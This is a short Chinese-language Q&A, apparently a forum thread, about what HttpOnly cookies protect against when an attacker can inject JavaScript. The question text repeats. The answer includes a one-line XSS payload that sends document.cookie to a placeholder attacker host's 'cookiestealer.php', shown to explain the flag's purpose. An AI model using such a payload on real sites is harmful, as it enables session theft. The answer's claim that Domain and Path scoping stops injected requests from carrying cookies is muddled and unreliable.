据我了解,客户端 js 无法读取 HttpOnly cookie,但它们由浏览器与任何后续请求一起传递。
如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?
HttpOnly cookie 的意义何在?
据我了解,客户端 js 无法读取 HttpOnly cookie,但它们由浏览器与任何后续请求一起传递。
如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?
HttpOnly cookie 的意义何在?
如果攻击者能够将 js 注入网页并向端点发出请求,它仍然会通过,因为所有 cookie 都会传递,对吗?
不会。Domain 和 Path 属性定义了 cookie 的范围:cookie 应该发送到哪些 URL。
在此处查看“定义 cookie 的发送位置”部分。
但是如果没有 HttpOnly,攻击者可以使用 js 访问 cookie 值:
<script> document.location=”http://Attacker’sIP/cookiestealer.php?c=”document.cookie; </script>